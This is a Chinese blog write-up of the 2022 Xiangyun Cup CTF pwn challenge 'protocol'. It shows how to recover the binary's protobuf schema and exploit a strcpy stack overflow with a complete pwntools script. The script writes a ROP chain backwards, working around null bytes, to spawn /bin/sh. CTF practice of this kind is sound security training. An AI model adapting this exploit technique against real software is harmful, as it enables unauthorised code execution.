祥云杯2022 pwn - protocol

最新推荐文章于 2024-06-27 20:21:16 发布
最新推荐文章于 2024-06-27 20:21:16 发布
阅读量1.1k 收藏
点赞数 2
分类专栏: wp 文章标签: python 开发语言 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/127778545
版权

祥云杯2022 pwn - protocol

一开始没看出来是Protobuf,搜了一圈里面的东西才知道是Protobuf
首先需要得到ctf.proto这个东西然后按着下面的顺序就行
错了的话就是需要安装
pip3 install protobuf pyqt5 pyqtwebengine requests websocket-client
git clone https://github.com/marin-m/pbtk
cd pbtk
./extractors/from_binary.py ../protocol ./
这个时候就可以得到一个ctf.proto的文件
把这个文件放到与题目文件同级的文件夹里
protoc --python_out=./ ./ctf.proto然后编译出ctf_pb2.py这个东西
然后在exp里导入ctf_pb2即可
这样子的话发送格式就是正常的

def send_payload(username = b'admin', password = b'admin'):
    d = ctf_pb2.pwn()
    d.username = username
    d.password = password
    strs = d.SerializeToString()
    r.sendafter(b'Login: ',strs)

漏洞点出在了strcpy中
在这里插入图片描述
在拷贝username和password的时候发生了栈溢出漏洞,因为username和password可控
直接放rop的话是不行的,因为\x00在strcpy中会被截断,所以倒着写rop
\x00的话可以利用strcpy最后会补上\x00这个特性来实现
笔者这里的rop就是read(0, xxxxx, 0x50),execve(“xxxx”, 0, 0)来getshell

from pwn import *
import ctf_pb2

context(arch='amd64', os='linux', log_level='debug')

file_name = './protocol'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def send_payload(username = b'admin', password = b'admin'):
    d = ctf_pb2.pwn()
    d.username = username
    d.password = password
    strs = d.SerializeToString()
    r.sendafter(b'Login: ',strs)

pop_rdi_ret = 0x0000000000404982
pop_rsi_ret = 0x0000000000588bbe
pop_rdx_ret = 0x000000000040454f
pop_rax_ret = 0x00000000005bdb8a
syscall = elf.search(asm('syscall\nret')).__next__()

def p1(offest, p):
    for i in range(8):
        send_payload(b'a' * (offest + 7 - i))
    send_payload(b'a' * offest + p64(p)[:3])

def p2(offest):
    for i in range(8):
        send_payload(b'a' * (offest + 7 - i))

bin_sh = 0x81B330

p1(0x1c0, syscall)
p2(0x1b8)
p1(0x1b0, pop_rdx_ret)
p2(0x1a8)
p1(0x1a0, pop_rsi_ret)
p1(0x198, bin_sh)
p1(0x190, pop_rdi_ret)

for i in range(8):
    send_payload(b'a' * (0x188 + 7 - i))
send_payload(b'a' * 0x188 + p64(0x3b)[:1])

p1(0x180, pop_rax_ret)

p1(0x178, syscall)

for i in range(8):
    send_payload(b'a' * (0x170 + 7 - i))
send_payload(b'a' * 0x170 + p64(0x50)[:1])

p1(0x168, pop_rdx_ret)
p1(0x160, bin_sh)
p1(0x158, pop_rsi_ret)
p2(0x150)
p1(0x148, pop_rdi_ret)

send_payload()
r.send('/bin/sh\x00')

r.interactive()

在这里插入图片描述

z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pwn ctf 入门 0x05
爱党人士
07-14 486
CTF-PWN pwn 基于二进制的漏洞挖掘与利用 基于漏洞的利用脚本 基于流量的复现脚本 能力分析 汇编代码逆向分析能力 程序内存分布 栈结构 堆结构 函数调用的流程(逆向的角度) 内存保护机制 汇编到c 自己去学点逆向去, 不然后面是看不懂的。 掌握汇编 崩不崩溃? 哈哈 pwn特点: 入门难,进阶难,精通难。 再了解一波结构。 64位的与32位的不同, 而很多人学的都是16位...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2024 cicsn ezbuf
llovewuzhengzi的博客
06-08 718
add会检查索引,然后根据索引分配会固定得到0x40大小的chunk,并且会把whatcon的内容赋值过去,10次delete,会检查索引范围,和对应索引的chunk是否为空,但free后没有清零,3次show。会在会检查索引范围,和对应索引的chunk是否为空,并且在whatsthis == '\xFF’和 whatsize == 48都不满足会打印出chunk的内容。当时压根不知道用了protobuf这个玩意,提取工具也没提取出来,还是做题做太少了,很多关键性的结构都没看出来是protobuf。
pwn】2022 杯 部分wp
woodwhale的博客
10-31 1206
2022 pwn 部分wp,有空复现别的题目
PWN · ret2libc | protobuf】[2024CISCN · 华中赛区]protoverflow
最新发布
Mr_Fmnwon的博客
06-27 812
第一次遇到protobuf,如果没有了解过,是显然做不出来的。此次复现,也算是点亮了一个技能点Protocol Buffers,是Google公司开发的一种数据描述语言,类似于XML能够将结构化数据序列化,可用于数据存储、通信协议等方面。常用于跨平台和异构系统中进行RPC调用,序列化和反序列化效率高且体积比XML和JSON小得多,非常适合网络传输。为了能够和程序进行交互,我们需要先逆向分析得到Protobuf结构体,然后构造序列化后的Protobuf与程序进行交互。具体不如参考PWN佬。
Python 操作 protobuf 常见用法
mijichui2153的博客
08-14 1万+
ProtoBuf: 是一套完整的 IDL(接口描述语言),出自Google,基于 C++ 进行的实现,开发人员可以根据 ProtoBuf 的语言规范生成多种编程语言(Golang、Python、Java 等)的接口代码,本篇只讲述 Python 的基础操作。据说 ProtoBuf 所生成的二进制文件在存储效率上比 XML 高 3~10 倍,并且处理性能高 1~2 个数量级,这也是选择 ProtoB...
google protobuf的应用及遇到的问题总结
热门推荐
Chenk的专栏
11-13 2万+
服务器端与客户端通信,使用google protobuf作为交互数据的序列化工具,其中客户端使用select机制实现I/O复用,服务端使用epoll机制,提高并发连接时的处理效率。想要再改进,实现大数据传输和大并发。希望能得到指点。
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
protobuf 中文操作手册
11-04
Google protobuf 官方文档中文翻译
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
Google Protobuf
可小辉的博客
02-01 872
目录 1.编码和解码的基本介绍 2.Netty本身的编码解码的机制和问题分析 3.Protobuf 4.Protobuf快速入门实例 5.Protobuf快速入门实例2 1.编码和解码的基本介绍 编写网络应用程序时,因为数据在网络中传输的都是二进制字节码数据,在发送数据时就需要编码,接收数据时就需要解码[示意图] codec(编解码器)的组成部分有两个:decoder(解码器)和encoder(编码器)。encoder负责把业务数据转换成字节码数据,dec...
【杂谈】protobuf详解
qq_36581961的博客
07-14 3682
我们在日常开发过程中进行网络通信和数据交换等应用场景中经常使用的技术是json或xml,最近接触了Google的Protobuf。在查阅相关资料学习 ProtoBuf 以及研读其源码之后,发现其在效率、兼容性等方面非常出色。在以后的项目技术选型中,尤其是网络通信、通用数据交换等场景应该会优先选择 ProtoBuf。下面详细的看下protobuf相关的内容 (protocol buffer) 是谷歌内部的混合语言数据标准。通过将结构化的数据进行序列化,用于通讯协议、数据存储等领域和语言无关、平台无关、可扩展的
深入二进制安全:全面解析Protobuf
返璞归真的博客
06-19 796
CTF二进制安全(Pwn)Protobuf相关知识点总结。 文章包括:Protobuf基础知识、语法、使用、逆向还原Protobuf结构体和例题实战等内容。
JavaScript Prototype污染攻击(CTF 例题分析)
a3320315的博客
11-03 1957
0x01 先谈谈自己的理解 function a(){} var b=new a() var c = {} a.__proto__.__proto__ == b.__proto__.__proto__ == c.__proto__ a.__proto__ != b.__proto__ != c 这个时候 b的__proto__ 指向的就是a.prototype a.prototype的_...
PWN题[强网先锋]no_output
am_03的博客
09-02 465
知识点 strcpy(dest, src) strcpy 函数用于将指定长度的字符串复制到字符数组里 语法形式为:char *strcpy(char *dest, const char *src, int n), 表示把src所指向的字符串里以src地址开始的前n个字节复制到dest所指的数组里,并返回被复制后的dest。 strcpy:strcpy只用于字符串复制,并且它不仅复制字符串内容之外,还会复制字符串的结束符 例:strcpy(a,b) b为源字符串,a为复制b的字符串 read(unk_804C
杯2022 writeup
渗透测试研究中心
11-02 1912
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
第十四届全国大学生信息安全竞赛-线上赛Writeup
末初的CSDN博客
05-16 1万+
第十四届全国大学生信息安全竞赛
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值